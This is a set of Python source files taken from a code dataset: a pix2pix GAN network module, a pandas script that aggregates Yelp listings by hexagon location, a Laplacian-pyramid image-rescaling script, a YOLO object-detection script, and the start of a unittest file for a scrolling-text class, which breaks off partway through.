norm_layer)\n else:\n raise('generator not implemented!')\n\n netG.apply(weights_init)\n return netG\n\ndef define_obj_D(vocab, input_nc, crop_size, ndf, n_layers_D, norm='instance', num_D=1, getIntermFeat=False, gpu_ids=[]):\n norm_layer = get_norm_layer(norm_type=norm)\n netD = MultiscaleObjDiscriminator(vocab, input_nc, crop_size, ndf, n_layers_D, norm_layer, num_D, getIntermFeat)\n\n netD.apply(weights_init)\n return netD\n\ndef define_img_D(input_nc, ndf, n_layers_D, norm='instance', num_D=1, getIntermFeat=False, gpu_ids=[]): \n norm_layer = get_norm_layer(norm_type=norm)\n netD = MultiscaleImgDiscriminator(input_nc, ndf, n_layers_D, norm_layer, num_D, getIntermFeat) \n\n netD.apply(weights_init)\n return netD\n\ndef print_network(net):\n if isinstance(net, list):\n net = net[0]\n num_params = 0\n for param in net.parameters():\n num_params += param.numel()\n print(net)\n print('Total number of parameters: %d' % num_params)\n\n##############################################################################\n# Generator\n##############################################################################\nclass LocalEnhancer(nn.Module):\n def __init__(self, input_nc, output_nc, ngf=32, n_downsample_global=3, n_blocks_global=9, \n n_local_enhancers=1, n_blocks_local=3, norm_layer=nn.BatchNorm2d, padding_type='reflect'): \n super(LocalEnhancer, self).__init__()\n self.n_local_enhancers = n_local_enhancers\n\n ###### global generator model ##### \n ngf_global = ngf * (2**n_local_enhancers)\n model_global = GlobalGenerator(input_nc, output_nc, ngf_global, n_downsample_global, n_blocks_global, norm_layer).model \n model_global = [model_global[i] for i in range(len(model_global)-3)] # get rid of final convolution layers\n self.model = nn.Sequential(*model_global)\n\n ###### local enhancer layers #####\n for n in range(1, n_local_enhancers+1):\n ### downsample: size / 2\n ngf_global = ngf * (2**(n_local_enhancers-n))\n model_downsample = [nn.ReflectionPad2d(1), nn.Conv2d(input_nc, ngf_global, kernel_size=3, padding=0), \n norm_layer(ngf_global), nn.ReLU(True),\n nn.Conv2d(ngf_global, ngf_global * 2, kernel_size=3, stride=2, padding=1), \n norm_layer(ngf_global * 2), nn.ReLU(True)]\n ### residual blocks\n model_upsample = []\n for i in range(n_blocks_local):\n model_upsample += [ResnetBlock(ngf_global * 2, padding_type=padding_type, norm_layer=norm_layer)]\n\n ### upsample\n model_upsample += [nn.ConvTranspose2d(ngf_global * 2, ngf_global, kernel_size=3, stride=2, padding=1, output_padding=1), \n norm_layer(ngf_global), nn.ReLU(True)]\n\n ### final convolution\n if n == n_local_enhancers: \n model_upsample += [nn.ReflectionPad2d(1), nn.Conv2d(ngf, output_nc, kernel_size=3, padding=0), nn.Tanh()] \n \n setattr(self, 'model'+str(n)+'_1', nn.Sequential(*model_downsample))\n setattr(self, 'model'+str(n)+'_2', nn.Sequential(*model_upsample))\n \n self.downsample = nn.AvgPool2d(3, stride=2, padding=[1, 1], count_include_pad=False)\n\n def forward(self, input):\n ### create input pyramid\n input_downsampled = [input]\n for i in range(self.n_local_enhancers):\n input_downsampled.append(self.downsample(input_downsampled[-1]))\n\n ### output at coarest level\n output_prev = self.model(input_downsampled[-1]) \n ### build up one layer at a time\n for n_local_enhancers in range(1, self.n_local_enhancers+1):\n model_downsample = getattr(self, 'model'+str(n_local_enhancers)+'_1')\n model_upsample = getattr(self, 'model'+str(n_local_enhancers)+'_2')\n input_i = input_downsampled[self.n_local_enhancers-n_local_enhancers]\n output_prev = model_upsample(model_downsample(input_i) + output_prev)\n return output_prev\n\nclass GlobalGenerator(nn.Module):\n def __init__(self, input_nc, output_nc, ngf=64, n_downsampling=3, n_blocks=9, norm_layer=nn.BatchNorm2d,\n padding_type='reflect'):\n assert(n_blocks >= 0)\n super(GlobalGenerator, self).__init__()\n activation = nn.ReLU(True)\n\n # netG = GlobalGenerator(input_nc, output_nc, ngf, n_downsample_global, n_blocks_global, norm_layer)\n model = [nn.ReflectionPad2d(1), nn.Conv2d(input_nc, ngf, kernel_size=3, padding=0), norm_layer(ngf), activation]\n ### downsample\n for i in range(n_downsampling):\n mult = 2**i\n model += [nn.Conv2d(ngf * mult, ngf * mult * 2, kernel_size=3, stride=2, padding=1),\n norm_layer(ngf * mult * 2), activation]\n\n ### resnet blocks\n mult = 2**n_downsampling\n for i in range(n_blocks):\n model += [ResnetBlock(ngf * mult, padding_type=padding_type, activation=activation, norm_layer=norm_layer)]\n\n ### upsample\n for i in range(n_downsampling):\n mult = 2**(n_downsampling - i)\n model += [nn.ConvTranspose2d(ngf * mult, int(ngf * mult / 2), kernel_size=3, stride=2, padding=1, output_padding=1),\n norm_layer(int(ngf * mult / 2)), activation]\n model += [nn.ReflectionPad2d(1), nn.Conv2d(ngf, output_nc, kernel_size=3, padding=0), nn.Tanh()]\n self.model = nn.Sequential(*model)\n\n def forward(self, input):\n return self.model(input)\n\n# Define a resnet block\nclass ResnetBlock(nn.Module):\n def __init__(self, dim, padding_type, norm_layer, activation=nn.ReLU(True), use_dropout=False):\n super(ResnetBlock, self).__init__()\n self.conv_block = self.build_conv_block(dim, padding_type, norm_layer, activation, use_dropout)\n\n def build_conv_block(self, dim, padding_type, norm_layer, activation, use_dropout):\n conv_block = []\n p = 0\n if padding_type == 'reflect':\n conv_block += [nn.ReflectionPad2d(1)]\n elif padding_type == 'replicate':\n conv_block += [nn.ReplicationPad2d(1)]\n elif padding_type == 'zero':\n p = 1\n else:\n raise NotImplementedError('padding [%s] is not implemented' % padding_type)\n\n conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p),\n norm_layer(dim),\n activation]\n if use_dropout:\n conv_block += [nn.Dropout(0.5)]\n\n p = 0\n if padding_type == 'reflect':\n conv_block += [nn.ReflectionPad2d(1)]\n elif padding_type == 'replicate':\n conv_block += [nn.ReplicationPad2d(1)]\n elif padding_type == 'zero':\n p = 1\n else:\n raise NotImplementedError('padding [%s] is not implemented' % padding_type)\n conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p),\n norm_layer(dim)]\n\n return nn.Sequential(*conv_block)\n\n def forward(self, x):\n out = x + self.conv_block(x)\n return out\n\nclass Encoder(nn.Module):\n def __init__(self, input_nc, output_nc, ngf=32, n_downsampling=4, norm_layer=nn.BatchNorm2d):\n super(Encoder, self).__init__()\n self.output_nc = output_nc\n\n model = [nn.ReflectionPad2d(3), nn.Conv2d(input_nc, ngf, kernel_size=7, padding=0),\n norm_layer(ngf), nn.ReLU(True)]\n ### downsample\n for i in range(n_downsampling):\n mult = 2**i\n model += [nn.Conv2d(ngf * mult, ngf * mult * 2, kernel_size=3, stride=2, padding=1),\n norm_layer(ngf * mult * 2), nn.ReLU(True)]\n\n ### upsample\n for i in range(n_downsampling):\n mult = 2**(n_downsampling - i)\n model += [nn.ConvTranspose2d(ngf * mult, int(ngf * mult / 2), kernel_size=3, stride=2, padding=1, output_padding=1),\n norm_layer(int(ngf * mult / 2)), nn.ReLU(True)]\n\n model += [nn.ReflectionPad2d(3), nn.Conv2d(ngf, output_nc, kernel_size=7, padding=0), nn.Tanh()]\n self.model = nn.Sequential(*model)\n\n def forward(self, input, inst):\n outputs = self.model(input)\n\n # instance-wise average pooling\n outputs_mean = outputs.clone()\n inst_list = np.unique(inst.cpu().numpy().astype(int))\n for i in inst_list:\n for b in range(input.size()[0]):\n indices = (inst[b:b+1] == int(i)).nonzero() # n x 4\n for j in range(self.output_nc):\n output_ins = outputs[indices[:,0] + b, indices[:,1] + j, indices[:,2], indices[:,3]]\n mean_feat = torch.mean(output_ins).expand_as(output_ins)\n outputs_mean[indices[:,0] + b, indices[:,1] + j, indices[:,2], indices[:,3]] = mean_feat\n return outputs_mean\n\nclass MultiscaleImgDiscriminator(nn.Module):\n def __init__(self, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d,\n num_D=3, getIntermFeat=False):\n super(MultiscaleImgDiscriminator, self).__init__()\n self.num_D = num_D\n self.n_layers = n_layers\n self.getIntermFeat = getIntermFeat\n\n for i in range(num_D):\n netD = NLayerImgDiscriminator(i, input_nc, ndf, n_layers, norm_layer, getIntermFeat)\n if getIntermFeat:\n for j in range(n_layers+3 - i):\n setattr(self, 'scale'+str(i)+'_layer'+str(j), getattr(netD, 'model'+str(j)))\n else:\n setattr(self, 'layer'+str(i), netD.model)\n\n self.downsample = nn.AvgPool2d(3, stride=2, padding=[1, 1], count_include_pad=False)\n\n def singleD_forward(self, model, input):\n if self.getIntermFeat:\n result = [input]\n for i in range(len(model)):\n result.append(model[i](result[-1]))\n\n return result[1:]\n else:\n return [model(input)]\n\n def forward(self, input):\n num_D = self.num_D\n result = []\n input_downsampled = input\n for i in range(num_D):\n if self.getIntermFeat:\n model = [getattr(self, 'scale'+str(i)+'_layer'+str(j)) for j in range(self.n_layers+2-i)]\n else:\n model = getattr(self, 'layer'+str(i))\n result.append(self.singleD_forward(model, input_downsampled))\n if i != (num_D-1):\n input_downsampled = self.downsample(input_downsampled)\n return result\n\n# Defines the PatchGAN discriminator with the specified arguments.\nclass NLayerImgDiscriminator(nn.Module):\n def __init__(self, ind, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d, getIntermFeat=False):\n super(NLayerImgDiscriminator, self).__init__()\n self.getIntermFeat = getIntermFeat\n self.n_layers = n_layers\n\n kw = 4\n padw = 0\n\n nf = ndf\n sequence = [[nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw), \n norm_layer(nf), nn.LeakyReLU(0.2, True)]]\n\n for n in range(0, n_layers-ind):\n nf_prev = nf\n nf = min(nf * 2, 512)\n if n == n_layers-ind:\n sequence += [[\n nn.Conv2d(nf_prev, nf, kernel_size=kw, stride=2, padding=padw),\n nn.LeakyReLU(0.2, True)\n ]]\n else:\n sequence += [[\n nn.Conv2d(nf_prev, nf, kernel_size=kw, stride=2, padding=padw),\n norm_layer(nf), nn.LeakyReLU(0.2, True)\n ]]\n\n sequence += [[nn.Conv2d(nf, 256, kernel_size=4, stride=2, padding=padw)]]\n sequence += [[nn.Conv2d(256, 1, kernel_size=1, stride=1)]]\n\n if getIntermFeat:\n for n in range(len(sequence)):\n setattr(self, 'model'+str(n), nn.Sequential(*sequence[n]))\n else:\n sequence_stream = []\n for n in range(len(sequence)):\n sequence_stream += sequence[n]\n self.model = nn.Sequential(*sequence_stream)\n \n def forward(self, input):\n if self.getIntermFeat:\n res = [input]\n for n in range(self.n_layers+3):\n model = getattr(self, 'model'+str(n))\n res.append(model(res[-1]))\n return res[1:]\n else:\n return self.model(input)\n\nclass MultiscaleObjDiscriminator(nn.Module):\n def __init__(self, vocab, input_nc, crop_size, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d,\n num_D=3, getIntermFeat=False):\n super(MultiscaleObjDiscriminator, self).__init__()\n self.vocab = vocab\n self.num_D = num_D\n self.n_layers = n_layers\n self.getIntermFeat = getIntermFeat\n self.crop_size = crop_size\n\n for i in range(num_D):\n netD = NLayerObjDiscriminator(i, self.vocab, input_nc, ndf, n_layers, norm_layer, getIntermFeat)\n if getIntermFeat:\n for j in range(n_layers+3 - i):\n setattr(self, 'scale'+str(i)+'_layer'+str(j), getattr(netD, 'model'+str(j)))\n else:\n setattr(self, 'layer'+str(i), netD.model)\n \n setattr(self, 'class_real'+str(i), netD.class_real)\n setattr(self, 'class_obj'+str(i), netD.class_obj)\n\n self.downsample = nn.AvgPool2d(3, stride=2, padding=[1, 1], count_include_pad=False)\n\n def singleD_forward(self, model, real_classifier, obj_classifier, input, boxes, obj_to_img):\n if self.getIntermFeat:\n # result = results from intermediate layers\n # real_scores = real or fake\n # obj_scores = obj classification score\n # cropped_input = crop_bbox_batch(input, boxes, obj_to_img, self.crop_size)\n result = [input]\n for i in range(len(model)):\n result.append(model[i](result[-1]))\n\n real_scores = real_classifier(result[-1])\n obj_scores = obj_classifier(result[-1])\n return result[1:], real_scores, obj_scores\n else:\n model_out = model(input)\n real_scores = real_classifier(model_out)\n obj_scores = obj_classifier(model_out)\n return real_scores, obj_scores\n\n def forward(self, input, boxes, obj_to_img):\n num_D = self.num_D\n result = []\n obj_crop = self.crop_size\n input_downsampled = crop_bbox_batch(input, boxes, obj_to_img, obj_crop)\n for i in range(num_D):\n if self.getIntermFeat:\n model = [getattr(self, 'scale'+str(i)+'_layer'+str(j)) for j in range(self.n_layers+3-i)]\n else:\n model = getattr(self, 'layer'+str(i))\n\n real_classifier = getattr(self, 'class_real'+str(i))\n obj_classifier = getattr(self, 'class_obj'+str(i))\n result.append(self.singleD_forward(model, real_classifier, obj_classifier, input_downsampled, boxes, obj_to_img))\n if i != (num_D-1):\n obj_crop = obj_crop // 2\n input_downsampled = crop_bbox_batch(self.downsample(input), boxes, obj_to_img, obj_crop)\n return result\n\n# Defines the discriminator with the specified arguments.\nclass NLayerObjDiscriminator(nn.Module):\n def __init__(self, ind, vocab, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d, getIntermFeat=False):\n super(NLayerObjDiscriminator, self).__init__()\n self.getIntermFeat = getIntermFeat\n self.n_layers = n_layers\n self.vocab = vocab\n\n kw = 4\n padw = 0\n\n sequence = [[nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw), \n norm_layer(ndf), nn.LeakyReLU(0.2, True)]]\n\n nf = ndf\n for n in range(0, n_layers - ind):\n nf_prev = nf\n nf = min(nf * 2, 512)\n sequence += [[\n nn.Conv2d(nf_prev, nf, kernel_size=kw, stride=2, padding=padw),\n norm_layer(nf), nn.LeakyReLU(0.2, True)\n ]]\n\n nf_prev = nf\n nf = min(nf * 2, 512)\n\n sequence += [[nn.Conv2d(nf_prev, nf, kernel_size=4, stride=2, padding=padw)]]\n sequence += [[GlobalAvgPool(), nn.Linear(nf, 1024)]]\n\n if getIntermFeat:\n for n in range(len(sequence)):\n setattr(self, 'model'+str(n), nn.Sequential(*sequence[n]))\n else:\n sequence_stream = []\n for n in range(len(sequence)):\n sequence_stream += sequence[n]\n self.model = nn.Sequential(*sequence_stream)\n\n num_objects = len(vocab['object_idx_to_name'])\n self.class_real = nn.Linear(1024, 1)\n self.class_obj = nn.Linear(1024, num_objects)\n\n def forward(self, input):\n if self.getIntermFeat:\n res = [input]\n for n in range(self.n_layers+2):\n model = getattr(self, 'model'+str(n))\n res.append(model(res[-1]))\n\n real_score = self.class_real(res[-1])\n obj_score = self.class_obj(res[-1])\n return res[1:]\n else:\n model_out = self.model(input)\n real_score = self.class_real(model_out)\n obj_score = self.class_obj(model_out)\n\n return model_out, real_score, obj_score\n","repo_name":"arcestalavera/sg-pix","sub_path":"network/pix2pix/networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":19123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25316861648","text":"import requests\nimport os\nimport dill\nimport time\nimport pandas as pd\n\n#Extracting and compiling information from dill files containing yelp data\ndict_1 = dill.load(open('dict_latlong_batch1.pkd', 'rb'))\ndict_2 = dill.load(open('dict_latlong_batch2.pkd', 'rb'))\ndict_3 = dill.load(open('dict_latlong_batch3.pkd', 'rb'))\n\ndict_all=[]\ndict_all=dict_1\nfor j in range(0,2000):\n dict_all[2000+j]=dict_2[j]\nfor j in range(len(dict_3)):\n dict_all[4000+j]=dict_3[j]\n\n#Converting to dictionary and adding h3_loc to relate to lat long information of hexagons\ndf_dict=pd.DataFrame()\nj=0\nfor i in range(len(dict_all)):\n df_1=pd.DataFrame(dict_all[i])\n df_1['h3_loc']=i\n print(j)\n j+=1\n df_dict=df_dict.append(df_1,ignore_index=True)\n\n#Dropping locations where same food place occurs multiple times, keeping closest hex to food place\ndf_final=df_dict.sort_values('distance').drop_duplicates('id', keep='first')\ndf_final=df_final.sort_values('h3_loc').reset_index()\n\n#Extracting category names\ndf_final1=df_final.reset_index()\ndf2=df_final1['categories'].apply(pd.Series)\n\n#Extracting categories\ntitle1=df2[0].apply(pd.Series)['title']\ntitle1=title1.reset_index()\ntitle1=title1.rename(columns={'index':'level_0','title':'category1'})\n\n#For plotting\ndf_final1=df_final1.merge(title1)\ndf_final1.to_csv('allentrieswCat1.csv')\n\n# Getting top 100 categories\na=title1.groupby('category1').agg('count')\ntop100_category1=a.sort_values('level_0',ascending=False)[0:100]\n\ndf_top100_category1=pd.DataFrame()\nfor i in range(len(top100_category1)):\n df_top100_category1=df_top100_category1.append(df_final1[df_final1['category1']==top100_category1.index[i]])\n\ndf_top100_category1_pivoted=df_top100_category1.pivot_table(index='h3_loc', columns='category1',\n aggfunc=len, fill_value=0).reset_index()\ndf_top100_category1_pivoted = df_top100_category1_pivoted['alias']\ndf_top100_category1_pivoted['h3_loc']=df_top100_category1['h3_loc']\ndf_top100_category1_pivoted=df_top100_category1_pivoted.set_index('h3_loc')\n\n# Saving for ML model\ndf_top100_category1_pivoted.to_csv('ByCategory1top100_pivoted.csv')\n","repo_name":"pratik-pednekar/NewFranchiseLocator","sub_path":"DataAnalysis.py","file_name":"DataAnalysis.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"43895166535","text":"from PIL import Image\nimport cv2\nfrom PIL import Image\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport glob\n\n#Laura\ndef pad_image_to_size(img, patch_size):\n if img.shape[0] or img.shape[1] < patch_size:\n difference_x = patch_size - img.shape[0]\n pad_x1 = difference_x // 2\n pad_x2 = difference_x // 2\n if not difference_x % 2 == 0:\n pad_x2 += 1\n\n difference_y = patch_size - img.shape[1]\n pad_y1 = difference_y // 2\n pad_y2 = difference_y // 2\n if not difference_y % 2 == 0:\n pad_y2 += 1\n\n i = np.pad(img, ((pad_x1, pad_x2), (pad_y1, pad_y2), (0, 0)), 'symmetric')\n return i\n else:\n print(\"WARNING! Not implemented in laplacian_scaling\")\n\ndef remove_pad_from_image(img, orignial_img,patch_size):\n if orignial_img.shape[0] or orignial_img.shape[1] < patch_size:\n difference_x = patch_size - orignial_img.shape[0]\n pad_x1 = difference_x // 2\n pad_x2 = difference_x // 2\n if not difference_x % 2 == 0:\n pad_x2 += 1\n\n difference_y = patch_size - orignial_img.shape[1]\n pad_y1 = difference_y // 2\n pad_y2 = difference_y // 2\n if not difference_y % 2 == 0:\n pad_y2 += 1\n\n i = img[pad_x1:-pad_x2,pad_y1:-pad_y2]\n return i\n else:\n print(\"WARNING! Not implemented in laplacian_scaling\")\n\n\n\n#https://theailearner.com/tag/laplacian-pyramid-opencv/\ndef calculate_gaussian_pyramids(img, num_levels):\n lower = img.copy()\n gaussian_pyr = [lower]\n for i in range(num_levels):\n lower = cv2.pyrDown(lower)\n gaussian_pyr.append(np.float32(lower))\n return gaussian_pyr\n\ndef reconstruct(laplacian_pyr):\n laplacian_top = laplacian_pyr[0]\n laplacian_lst = [laplacian_top]\n num_levels = len(laplacian_pyr) - 1\n for i in range(num_levels):\n size = (laplacian_pyr[i + 1].shape[1], laplacian_pyr[i + 1].shape[0])\n laplacian_expanded = cv2.pyrUp(laplacian_top, dstsize=size)\n laplacian_top = cv2.add(laplacian_pyr[i+1], laplacian_expanded)\n laplacian_lst.append(laplacian_top)\n return laplacian_lst\n\n\n# Then calculate the Laplacian pyramid\ndef calculate_laplacian_pyramids(gaussian_pyr):\n laplacian_top = gaussian_pyr[-1]\n num_levels = len(gaussian_pyr) - 1\n\n laplacian_pyr = [laplacian_top]\n for i in range(num_levels, 0, -1):\n size = (gaussian_pyr[i - 1].shape[1], gaussian_pyr[i - 1].shape[0])\n gaussian_expanded = cv2.pyrUp(gaussian_pyr[i], dstsize=size)\n laplacian = np.subtract(gaussian_pyr[i - 1], gaussian_expanded)\n laplacian_pyr.append(laplacian)\n return laplacian_pyr\n\nif __name__ == '__main__':\n # path = \"/home/laurawenderoth/Documents/kidney_microscopy/data/PAS/CKD154-003-PAS-fully-aligned.png\"\n # img = Image.open(path)\n # img = np.array(img)\n # #new image\n # path = \"/home/laurawenderoth/Documents/kidney_microscopy/data/IF/CKD154-003-IF-fully-aligned.png\"\n # IF = Image.open(path)\n # IF = np.array(IF)\n # lower = img.copy()\n # # Create a Gaussian Pyramid\n # gaussian_pyr = [lower]\n # for i in range(5):\n # lower = cv2.pyrDown(lower)\n # gaussian_pyr.append(lower)\n # # Last level of Gaussian remains same in Laplacian\n # laplacian_top = gaussian_pyr[-1]\n #\n # # Create a Laplacian Pyramid\n # laplacian_pyr = [laplacian_top]\n # for i in range(5, 0, -1):\n # size = (gaussian_pyr[i - 1].shape[1], gaussian_pyr[i - 1].shape[0])\n # gaussian_expanded = cv2.pyrUp(gaussian_pyr[i], dstsize=size)\n # laplacian = cv2.subtract(gaussian_pyr[i - 1], gaussian_expanded)\n # laplacian_pyr.append(laplacian)\n # for g in laplacian_pyr:\n # g = np.array(g, dtype=np.uint8)\n # g= g/g.max()\n # print(g.min(),g.max())\n # plt.imshow(g)\n # plt.show()\n\n path = \"/home/laurawenderoth/Documents/kidney_microscopy/data/PAS/CKD154-003-PAS-fully-aligned.png\"\n img = Image.open(path)\n img = np.array(img)\n # down_img = downsampling(img)\n # up_img = laplacian_upsampling(img,down_img)\n\n expo = np.array(img).shape[0].bit_length()\n num_levels = expo - 8\n print(img.shape)\n img_pad = pad_image_to_size(img,2048)\n lower = img_pad.copy()\n gaussian_pyramids = calculate_gaussian_pyramids(np.array(lower), num_levels)\n g = gaussian_pyramids[-1]\n g = np.array(g, dtype=np.uint8)\n print(g.shape)\n #new image\n path = \"/home/laurawenderoth/Documents/kidney_microscopy/data/IF/CKD154-003-IF-fully-aligned.png\"\n IF = Image.open(path)\n IF = np.array(IF)\n img_pad_if = pad_image_to_size(IF, 2048)\n lower_if = img_pad_if.copy()\n gaussian_pyramids_if = calculate_gaussian_pyramids(np.array(lower_if), num_levels)\n g_if = gaussian_pyramids_if[-1]\n g_if= np.array(g_if, dtype=\"float32\")\n\n laplacian_pyramid = calculate_laplacian_pyramids(gaussian_pyramids)\n l_if_pyramids = laplacian_pyramid.copy()\n l_if_pyramids[0] = g_if\n laplacian_lst = reconstruct(l_if_pyramids)\n fertiges_Bild = laplacian_lst[-1]\n #veränderung dtype von float32 zu np.uint8\n fertiges_Bild = np.array(fertiges_Bild, dtype=np.uint8)\n img_without_pad = remove_pad_from_image(fertiges_Bild,img,2048)\n plt.imshow(img)\n plt.title(\"orignial image PAS\")\n plt.show()\n plt.imshow(img_pad)\n plt.title(\"padded image PAS\")\n plt.show()\n g_if = np.array(g_if, dtype=np.uint8)\n plt.imshow(g_if)\n plt.title(\"downsampled image IF\")\n plt.show()\n plt.imshow(fertiges_Bild)\n plt.title(\"upsampled image IF with PAS Laplacian pyramids\")\n plt.show()\n plt.imshow(img_without_pad)\n plt.title(\"upsampled without padding\")\n plt.show()\n\n'''\nfor g in gaussian_pyramid:\n g = np.array(g, dtype=np.uint8)\n plt.imshow(g)\n plt.show()\n \nfig = plt.figure(figsize=(10,5))\n fig.add_subplot(1, 4, 1)\n plt.imshow(img)\n fig.add_subplot(1, 4, 2)\n plt.imshow(g)\n fig.add_subplot(1, 4, 3)\n plt.imshow(fertiges_Bild)\n fig.add_subplot(1, 4, 4)\n plt.imshow(img_without_pad)\n plt.show()\n'''","repo_name":"LauraWenderoth/Bachelorarbeit_Kidney_Stain_Transfer","sub_path":"laplacian_scaling.py","file_name":"laplacian_scaling.py","file_ext":"py","file_size_in_byte":6096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12468087415","text":"# import packages\nimport numpy as np\nimport argparse\nimport time\nimport cv2\nimport os\n\n# construct the argument parser\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", required=True, help=\"path to input image\")\nap.add_argument(\"-y\", \"--yolo\", required=True, help=\"base path to the Yolo directory\")\nap.add_argument(\"-c\", \"--confidence\", type=float, default=0.5, help=\"minimum probability to filter weak detections\")\nap.add_argument(\"-t\", \"--threshold\", type=float, default=0.3, help=\"threshold when applying non-maxima suppression\")\nargs = vars(ap.parse_args())\n\n# load the COCO class labels\nlabelsPath = os.path.sep.join([args[\"yolo\"], \"coco.names\"])\nLABELS = open(labelsPath).read().strip().split(\"\\n\")\n\n# initialize a list of colors to represent each label in the class labels\nnp.random.seed(54)\nCOLORS = np.random.randint(0, 255, size=(len(LABELS), 3), dtype=\"uint8\")\n\n# define path to Yolo weights and model configuration\nweightsPath = os.path.sep.join([args[\"yolo\"], \"yolov3.weights\"])\nconfigPath = os.path.sep.join([args[\"yolo\"], \"yolov3.cfg\"])\n\n# load our Yolo object detector trained on the COCO dataset (80 classes)\nprint(\"[INFO] ... loading Yolo model from disk\")\nnet = cv2.dnn.readNetFromDarknet(configPath, weightsPath)\n\n# load input image and grab its spatial dimensions\nimage = cv2.imread(args[\"image\"])\n(H, W) = image.shape[:2]\n\n# determine the output layer names that we need from Yolo\nln = net.getLayerNames()\nln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]\n\n# construct a blob from the input image and then perform a forward pass\n# of the Yolo object detector giving us our bounding boxes and associated probabilities\nblob = cv2.dnn.blobFromImage(image, 1/255.0, (416, 416), swapRB=True, crop=False)\nnet.setInput(blob)\nstart = time.time()\nlayerOutputs = net.forward(ln)\nend = time.time()\nprint(\"[INFO] ... Yolo took {:.6f} seconds\".format(end - start))\n\n\n# define output visualization lists\nboxes, confidences, classIDs = [], [], []\n\n# Populate the visualization lists from our Yolo forward pass\n\n# loop over each of the layer outputs\nfor output in layerOutputs:\n # loop over each of the object detections\n for detection in output:\n # extract the class ID and confidence (i.e. probability score) of the current object detection\n scores = detection[5:]\n classID = np.argmax(scores)\n confidence = scores[classID]\n\n # filter out weak predictions by ensuring the detected probability is\n # greater than the minimum probability\n if confidence > args[\"confidence\"]:\n # scale the bounding box coordinates back relative to the\n # size of the image, keeping in mind that YOLO actually\n # returns the center (x, y)-coordinates of the bounding\n # box followed by the boxes' width and height\n box = detection[0:4] * np.array([W, H, W, H]) # scales bounding box for overlay on image\n (centerX, centerY, width, height) = box.astype(\"int\")\n\n # use the center (x, y) coordinates to derive the top and left corner of the bounding box\n x = int(centerX - (width / 2))\n y = int(centerY - (height / 2))\n\n # update our output lists\n boxes.append([x, y, int(width), int(height)])\n confidences.append(float(confidence))\n classIDs.append(classID)\n\n# apply non-maxima suppression to suppress weak, overlapping bounding boxes\n# Note: Yolo does not apply non-maxima suppression for us, so we need to explicitly apply it\nidxs = cv2.dnn.NMSBoxes(boxes, confidences, args[\"confidence\"], args[\"threshold\"])\n\n# applying non-maxima suppression suppresses overlapping bounding boxes, keeping only the most\n# confident ones\n\n# Draw the bounding boxes and class text on the original image\n# ensure at least one detection exists\nif len(idxs) > 0:\n # loop over the indexes we are keeping\n for i in idxs.flatten():\n # extract the bounding box coordinates\n (x, y) = (boxes[i][0], boxes[i][1])\n (w, h) = (boxes[i][2], boxes[i][3])\n\n # draw a bounding box rectangle and label on the image\n color = [int(c) for c in COLORS[classIDs[i]]]\n cv2.rectangle(image, (x, y), (x + w, y + h), color, 2)\n text = \"{}: {:.4f}\".format(LABELS[classIDs[i]], confidences[i])\n cv2.putText(image, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)\n\n# show the output image\ncv2.imshow(\"Image\", image)\ncv2.waitKeyEx(0)\n\n\n\n","repo_name":"BLarzalere/AI","sub_path":"Object Detection/yolo.py","file_name":"yolo.py","file_ext":"py","file_size_in_byte":4470,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"31899240605","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 23 15:12:37 2018\n\n@author: Sebastien Roy\n\"\"\"\n\nimport unittest\nimport time\nimport logging\n\n\nfrom scrollingtext import ScrollingText\n\nclass test_ScrollingText(unittest.TestCase):\n \"\"\" This is unitary tests for class ScrollingText\n \"\"\"\n\n def setUp(self):\n \"\"\" Initialisation\n \"\"\"\n self._current_text = \"\"\n self._text_counter = []\n logging.basicConfig(format='%(levelname)s:%(asctime)s:%(message)s',\n level=logging.ERROR\n )\n\n\n\n def text_function(self):\n return \"test that is very long\"\n\n def text_callback(self, originator, value):\n self._current_text = value\n\n def test_initial_value(self):\n \"\"\" This tests the initial value of the output text\n \"\"\"\n print(\"---------------------------\")\n print(\"Begining test initial value...\")\n scroll_text = ScrollingText(self.text_function, self.text_callback, 5,\n refresh_rate=0, scroll_begin_delay=0.1,\n scroll_end_delay=0.05, scroll_rate=0.01)\n # check that the callback is not called at the initialization\n self.assertEqual(self._current_text, \"\")\n\n scroll_text.start()\n # the text is now the 5 first letters of the given text\n # no wait is necessary to give the text\n self.assertEqual(self._current_text, \"test \")\n scroll_text.stop()\n print(\"...end test initial value\")\n\n def test_text_lenght(self):\n \"\"\" This checks that, one initialized, the length of the output text\n is always the same\n \"\"\"\n print(\"---------------------------\")\n print(\"Begining test text length...\")\n scroll_text = ScrollingText(self.text_function, self.text_callback, 5,\n refresh_rate=0, scroll_begin_delay=0.1,\n scroll_end_delay=0.05, scroll_rate=0.01)\n scroll_text.start()\n self.assertEqual(len(self._current_text), 5)\n time.sleep(0.1)\n self.assertEqual(len(self._current_text), 5)\n time.sleep(0.1)\n self.assertEqual(len(self._current_text), 5)\n scroll_text.stop()\n print(\"... end test text length.\")\n\n def test_restart(self):\n \"\"\" This checks that a scrolling text can be paused and resumed\n \"\"\"\n print(\"---------------------------\")\n print(\"Begining test restart...\")\n scroll_text = ScrollingText(self.text_function, self.text_callback, 5,\n refresh_rate=0, scroll_begin_delay=0.05,\n scroll_end_delay=0.05, scroll_rate=0.01)\n\n # The text function returns \"test that is very long\"\n # So, at beginning, the text should start with \"test\"\n scroll_text.start()\n 